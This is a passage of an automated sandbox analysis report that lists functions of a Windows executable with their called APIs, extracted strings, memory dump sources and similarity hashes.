                                                              • Instruction Fuzzy Hash: DCF062F4C20250BFC704FFB1E90988FBBA9AF583007108518F9048B212DA34DA628E92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0022388C Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 34COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: /="$M="$V8"$k="$z="
                                                              • API String ID: 431132790-2650672009
                                                              • Opcode ID: e41209eeda0ca83940c47c4366db01ac3496d667dc849c7ae2db34e25a1e56c7
                                                              • Instruction ID: 56f764a44e5c3afad8df87376aad82c2f841c7690775fc629c6dcb9a8487f9c3
                                                              • Opcode Fuzzy Hash: e41209eeda0ca83940c47c4366db01ac3496d667dc849c7ae2db34e25a1e56c7
                                                              • Instruction Fuzzy Hash: FD017CB1120A16EBC710EF64E908649FBF1BF50311F508258E0188B661DBB0E9B4CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00219DC6 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,00000038,00000000,?,00000000,?,00000008,00000008,?,00216163,?,?,?,00000000,00000000), ref: 00219E0D
                                                              • HeapAlloc.KERNEL32(00000000,?,00216163,?,?,?,00000000,00000000), ref: 00219E14
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: 3a9e60ceaa6e341342624e40792268ad9d875c1069935206b989e28f7d61f0fa
                                                              • Instruction ID: 7cf0cbbfafd2f4ac5d1ebfcd8f89ddb168fd8ce726dbb188498a784977207088
                                                              • Opcode Fuzzy Hash: 3a9e60ceaa6e341342624e40792268ad9d875c1069935206b989e28f7d61f0fa
                                                              • Instruction Fuzzy Hash: 0A310936520206DFDF10DF64C854A9A77E5EFA4360B26802AF9098F241DB71ECE1CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021B8D7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 223COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 0021B9AC
                                                              • _strcpy_s.LIBCMT ref: 0021B9BD
                                                                • Part of subcall function 0021B580: __get_errno.LIBCMT ref: 0021B58E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: __get_errno_memset_strcpy_s
                                                              • String ID: @
                                                              • API String ID: 179418724-2766056989
                                                              • Opcode ID: 41cf61d0c30ce23761258c2198008d3be492f4594770155e919c187adad70524
                                                              • Instruction ID: 997944a7dbf914d3e2577d7b2e288e637dc4acbec339a738e57f0a431afd2ef1
                                                              • Opcode Fuzzy Hash: 41cf61d0c30ce23761258c2198008d3be492f4594770155e919c187adad70524
                                                              • Instruction Fuzzy Hash: 91818BB5514202AFC700EF64D88499AFBF4FFA8324F108A1DF95997261D731EDA1CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021746A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • UuidCreate.RPCRT4(?), ref: 00217496
                                                              • UuidToStringW.RPCRT4(?,00000000), ref: 002174C3
                                                              • RpcStringFreeW.RPCRT4(00000000), ref: 002174FF
                                                              Strings
                                                              • Failed to convert GUID to string., xrefs: 002174D7
                                                              • Failed to create a new GUID., xrefs: 002174B4
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: StringUuid$CreateFree
                                                              • String ID: Failed to convert GUID to string.$Failed to create a new GUID.
                                                              • API String ID: 3044360575-1364151769
                                                              • Opcode ID: d447e4a16b6dd9fe7a01f7c828e5bf916beb734eb5f45aa22210b12da994e3ae
                                                              • Instruction ID: f29684f349ba76098af66646593112340294f3be076fa82ee4b3306573222409
                                                              • Opcode Fuzzy Hash: d447e4a16b6dd9fe7a01f7c828e5bf916beb734eb5f45aa22210b12da994e3ae
                                                              • Instruction Fuzzy Hash: F211BC71B2421AABDB109FF9DC89AEFB7F9AB6C310F104435EA05E3140DA78D4948B50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002335E6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _malloc.LIBCMT ref: 00233600
                                                                • Part of subcall function 0022CDB5: __FF_MSGBANNER.LIBCMT ref: 0022CDCE
                                                                • Part of subcall function 0022CDB5: __NMSG_WRITE.LIBCMT ref: 0022CDD5
                                                                • Part of subcall function 0022CDB5: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0022DBEB,?,00000001,?,?,0022D143,00000018,00236FA0,0000000C,0022D1D8), ref: 0022CDFA
                                                              • std::exception::exception.LIBCMT ref: 00233635
                                                              • std::exception::exception.LIBCMT ref: 0023364F
                                                              • __CxxThrowException@8.LIBCMT ref: 00233660
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                              • String ID: bad allocation
                                                              • API String ID: 615853336-2104205924
                                                              • Opcode ID: 3411c39d979486b3138daf07b33917c2913b6658d9d8fa934001870438a0744d
                                                              • Instruction ID: 8a5fc37da0ee2a6bb697be251aefd239657b0507e24312ef368f16d78ac4da94
                                                              • Opcode Fuzzy Hash: 3411c39d979486b3138daf07b33917c2913b6658d9d8fa934001870438a0744d
                                                              • Instruction Fuzzy Hash: 6E01F7B2934219AACB00EF54E807AAE7BBC9B85714F940015F50496191DBB09B75CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002191D3 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(00000000,?,00000000,0023BEF0,?,?,?,00216F20,00F10128,00000000,?,?,00000000,?,?,00215B53), ref: 002191F9
                                                              • CreateDirectoryW.KERNELBASE(00000000,?,?,?,00216F20,00F10128,00000000,?,?,00000000,?,?,00215B53,?,?,?), ref: 00219210
                                                              • GetLastError.KERNEL32(?,?,00216F20,00F10128,00000000,?,?,00000000,?,?,00215B53,?,?,?,?,?), ref: 0021921E
                                                                • Part of subcall function 002191D3: CreateDirectoryW.KERNEL32(00000000,?,?,?,00216F20,00F10128,00000000,?,?,00000000,?,?,00215B53,?,?,?), ref: 00219273
                                                                • Part of subcall function 002191D3: GetLastError.KERNEL32(?,?,00216F20,00F10128,00000000,?,?,00000000,?,?,00215B53,?,?,?,?,?), ref: 0021927D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast$AttributesFile
                                                              • String ID:
                                                              • API String ID: 925696554-0
                                                              • Opcode ID: 7695efbfb773677d8db4ea3da3d49f45b807ca8eda68bd6ad0392ce90b601bce
                                                              • Instruction ID: d5628d570c40eac8c17af7ef40e472cb4492884b7869e141b5c4deddef1d4a8d
                                                              • Opcode Fuzzy Hash: 7695efbfb773677d8db4ea3da3d49f45b807ca8eda68bd6ad0392ce90b601bce
                                                              • Instruction Fuzzy Hash: 2F21F236920203BBEB201F64EC65BEA36D9EFB43A0F354025ED49D6050DA76CDE29250
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021F95E Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 504COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0021F965
                                                                • Part of subcall function 00222C43: __CxxThrowException@8.LIBCMT ref: 00222C6A
                                                                • Part of subcall function 00222C43: _memmove.LIBCMT ref: 00222CBB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw_memmove
                                                              • String ID: kQ"$lU!
                                                              • API String ID: 3426943727-2369180469
                                                              • Opcode ID: 712384fb5502077233829ee12ee51aa59946518acac547c4715015b56b8ec634
                                                              • Instruction ID: a41f4c92587c24e5e5761fc5722237796fd38569cece1a930fe2a3e45f4dbd80
                                                              • Opcode Fuzzy Hash: 712384fb5502077233829ee12ee51aa59946518acac547c4715015b56b8ec634
                                                              • Instruction Fuzzy Hash: 10324071418386DFC370DF68C584BDABBE0BF98304F54496EE8898B252DB70A994CF52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021BC8E Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 254COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 002335E6: _malloc.LIBCMT ref: 00233600
                                                                • Part of subcall function 0021CA78: GetSystemInfo.KERNELBASE(?), ref: 0021CACB
                                                              • _memset.LIBCMT ref: 0021BDC4
                                                              • _strcpy_s.LIBCMT ref: 0021BDCE
                                                              • _strcat_s.LIBCMT ref: 0021BDD8
                                                                • Part of subcall function 0021B580: __get_errno.LIBCMT ref: 0021B58E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem__get_errno_malloc_memset_strcat_s_strcpy_s
                                                              • String ID: W
                                                              • API String ID: 3172754772-655174618
                                                              • Opcode ID: 3f3005c520f6a962a75e61b6140cb317d786e595700b6099dbc6b7e5b74deaf6
                                                              • Instruction ID: f59b4608a0f01af6916bdacbb28035938e317383d0163962cab087257be58ce6
                                                              • Opcode Fuzzy Hash: 3f3005c520f6a962a75e61b6140cb317d786e595700b6099dbc6b7e5b74deaf6
                                                              • Instruction Fuzzy Hash: 5B919E30A1020AEFCB12DFA5C884AEEBBF5AF99710F248559F504AB251DB71D991CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021768D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 002176D2
                                                              • QueryDosDeviceW.KERNELBASE(?,?,00000400,?,00000000,?), ref: 002176EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: DeviceQuery_memset
                                                              • String ID: harddisk$ramdisk
                                                              • API String ID: 2562551966-3524468269
                                                              • Opcode ID: 2c046f99772dac190ecb16e40da2c4201d052c8525ccd424338eadd0e16a7a81
                                                              • Instruction ID: e2e68a38578d26114db3814927d9f37e89bcabd9385bf297e13ab3c31e4f0d7c
                                                              • Opcode Fuzzy Hash: 2c046f99772dac190ecb16e40da2c4201d052c8525ccd424338eadd0e16a7a81
                                                              • Instruction Fuzzy Hash: FE11C435E14218BACB00DFF5EC05ADEB3FCAF54314F1080A6E508E7140EA309AA98F94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002165F9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,00000024,002164D8,?,0021654C,?,00000024,?,0021AFDF,00000007,?,?,00000000,00000000,?,?), ref: 00216616
                                                              • SendMessageW.USER32(00008001,00000000,00000000,00000000), ref: 00216683
                                                              Strings
                                                              • Failed to add file name on to status prefix: %S, xrefs: 00216654
                                                              • %s..., xrefs: 0021668B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: HandleMessageModuleSend
                                                              • String ID: %s...$Failed to add file name on to status prefix: %S
                                                              • API String ID: 1379669478-1181359081
                                                              • Opcode ID: 6cf6e885d074d3a999caecee3159013ead9d1060d9bbabde1013faf87e75d4bf
                                                              • Instruction ID: 96130bc736e14dd2d5547e4edd5273c438e4701369476037020482035409a9ca
                                                              • Opcode Fuzzy Hash: 6cf6e885d074d3a999caecee3159013ead9d1060d9bbabde1013faf87e75d4bf
                                                              • Instruction Fuzzy Hash: FE119E71821255FFDF259F50ED4E9EE7FBAAB31B44B204011F84871021D77A9AF0AB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021ECDB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_memmove
                                                              • String ID:
                                                              • API String ID: 1268875249-3916222277
                                                              • Opcode ID: 110c4080d35b118574da5a948a75096093f480ab754ed639c2e256418516b572
                                                              • Instruction ID: 03a8778d009de2c653e51c0edab314dbf2fb1ae922a1d4021b709f8ecb30abca
                                                              • Opcode Fuzzy Hash: 110c4080d35b118574da5a948a75096093f480ab754ed639c2e256418516b572
                                                              • Instruction Fuzzy Hash: 17516F7191021A9BCF10DFA4DC81AEEB7F5FF58320F254529EC15A7241D770AEA18BA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002164D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFileAttributesW.KERNELBASE(?,00000080,?,00000024,?,0021AFDF,00000007,?,?,00000000,00000000,?,?,?), ref: 00216560
                                                              Strings
                                                              • Unable ro register file for clean-up, xrefs: 00216574
                                                              • User canceled extraction..., xrefs: 002165BB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID: Unable ro register file for clean-up$User canceled extraction...
                                                              • API String ID: 3188754299-368570184
                                                              • Opcode ID: cd10ba120e6571b9dcc99423b0c193807b0ab2a0aceba631cf6263e44bfa414f
                                                              • Instruction ID: 1a7fa6b011695f0831c3d85117dcc42ff45d6a867574ea277c8e9d7adc456783
                                                              • Opcode Fuzzy Hash: cd10ba120e6571b9dcc99423b0c193807b0ab2a0aceba631cf6263e44bfa414f
                                                              • Instruction Fuzzy Hash: 84216571534126BBCB21BF10E84DADE37D7AB34B50BA18415F805A6119EA70D8F0DF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00219663 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetCurrentDirectoryW.KERNELBASE(?,_^!,00000000,?,?,00215E5F), ref: 00219682
                                                              • GetLastError.KERNEL32(?,?,00215E5F), ref: 0021968C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectoryErrorLast
                                                              • String ID: _^!
                                                              • API String ID: 152501406-4042313755
                                                              • Opcode ID: d3f0512b4dd899b2bcb170cbd5b6de085afeab73a0f5b8fb9516696e4f5d453c
                                                              • Instruction ID: 0c279e8413662f3f6e62baa620be764ac886ab39b5f73ccf883f30fa81d671b5
                                                              • Opcode Fuzzy Hash: d3f0512b4dd899b2bcb170cbd5b6de085afeab73a0f5b8fb9516696e4f5d453c
                                                              • Instruction Fuzzy Hash: A9F0BE33C21136ABDB215A91DD29BCDBAA89F20764F224174AE00B7150DB35CEE09AE4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00219CFE Relevance: 5.1, APIs: 4, Instructions: 72memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00219CA3: CreateFileW.KERNELBASE(?,?,0023BEF0,00000000,00215AE3,?,00000000,?,00000000,?,?,?,0021843A,?,40000000,00000005), ref: 00219CD2
                                                              • GetLastError.KERNEL32(?,80000000,00000007,00000003,08000080,00000000,?,?,?,?,002160C2,?,?,00000000,00000000), ref: 00219D29
                                                              • GetProcessHeap.KERNEL32(00000008,00000010,?,80000000,00000007,00000003,08000080,00000000,?,?,?,?,002160C2,?,?,00000000), ref: 00219D52
                                                              • HeapAlloc.KERNEL32(00000000,?,?,002160C2,?,?,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 00219D59
                                                              • CloseHandle.KERNEL32(000000FF,?,?,002160C2,?,?,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 00219DB2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocCloseCreateErrorFileHandleLastProcess
                                                              • String ID:
                                                              • API String ID: 3300431839-0
                                                              • Opcode ID: 63edf2129ea26e0b685b51fdd8842aafc5bc327abb761a8e6a90ad47479b04c5
                                                              • Instruction ID: 37d5cce56db46b7ba8aa7e91c215f7cf50399f95dd93b07f6c9058edee7d5bcc
                                                              • Opcode Fuzzy Hash: 63edf2129ea26e0b685b51fdd8842aafc5bc327abb761a8e6a90ad47479b04c5
                                                              • Instruction Fuzzy Hash: 44110832D20622AFD3312F68AC157D9B9D09F61770F124320ED65AB1D0DB709DE086D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002336DB Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __getptd_noexit.LIBCMT ref: 002336E0
                                                                • Part of subcall function 0022A6D5: GetLastError.KERNEL32(00000001,00000000,0022B05E,0022CE3E,00000000,?,0022DBEB,?,00000001,?,?,0022D143,00000018,00236FA0,0000000C,0022D1D8), ref: 0022A6D9
                                                                • Part of subcall function 0022A6D5: ___set_flsgetvalue.LIBCMT ref: 0022A6E7
                                                                • Part of subcall function 0022A6D5: __calloc_crt.LIBCMT ref: 0022A6FB
                                                                • Part of subcall function 0022A6D5: _DecodePointerInternal@4.G5K9HNJ7(00000000,?,0022DBEB,?,00000001,?,?,0022D143,00000018,00236FA0,0000000C,0022D1D8,?,?,?,0022A803), ref: 0022A715
                                                                • Part of subcall function 0022A6D5: GetCurrentThreadId.KERNEL32 ref: 0022A72B
                                                                • Part of subcall function 0022A6D5: SetLastError.KERNEL32(00000000,?,0022DBEB,?,00000001,?,?,0022D143,00000018,00236FA0,0000000C,0022D1D8,?,?,?,0022A803), ref: 0022A743
                                                              • __freeptd.LIBCMT ref: 002336EA
                                                                • Part of subcall function 0022A8A6: TlsGetValue.KERNEL32(?,?,002336EF,00000000,?,00233720,00000000), ref: 0022A8C7
                                                                • Part of subcall function 0022A8A6: TlsGetValue.KERNEL32(?,?,002336EF,00000000,?,00233720,00000000), ref: 0022A8D9
                                                                • Part of subcall function 0022A8A6: _DecodePointerInternal@4.G5K9HNJ7(00000000,?,002336EF,00000000,?,00233720,00000000), ref: 0022A8EF
                                                                • Part of subcall function 0022A8A6: __freefls@4.LIBCMT ref: 0022A8FA
                                                                • Part of subcall function 0022A8A6: TlsSetValue.KERNEL32(0000000E,00000000,?,002336EF,00000000,?,00233720,00000000), ref: 0022A90C
                                                              • ExitThread.KERNEL32 ref: 002336F3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Value$DecodeErrorInternal@4LastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 68672458-0
                                                              • Opcode ID: b7b50b73748435b5f16bd5b4044da7e3ee253cd4ae38251df4e5d300d179a056
                                                              • Instruction ID: 75c2ae1e4471e1da0c7a92c59ccaa337e6fa45e0a6fe52da159ebf71a6215a1f
                                                              • Opcode Fuzzy Hash: b7b50b73748435b5f16bd5b4044da7e3ee253cd4ae38251df4e5d300d179a056
                                                              • Instruction Fuzzy Hash: 2AC08C304106057FCA103BA2BC0FE1A3A0D8B80350B048020B80481652DE78E961886A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00227EC4 Relevance: 3.8, APIs: 3, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EnterCriticalSection.KERNEL32(00000000), ref: 00227EE9
                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 00227F09
                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 00227F29
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$Leave$Enter
                                                              • String ID:
                                                              • API String ID: 2978645861-0
                                                              • Opcode ID: 381c4f74b8a7f39ba9d373faf5643a02938c1457d377c96c122ac9e8d6018fac
                                                              • Instruction ID: 552f70b0107d0f3b2edc630b8107758ee58c08cc963051ef72f9e3fc097cb7dc
                                                              • Opcode Fuzzy Hash: 381c4f74b8a7f39ba9d373faf5643a02938c1457d377c96c122ac9e8d6018fac
                                                              • Instruction Fuzzy Hash: 51116D75A04306FFCB10CF98D948B9ABBB9FF48310F248459FA1597650D770EA14CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021D716 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              APIs
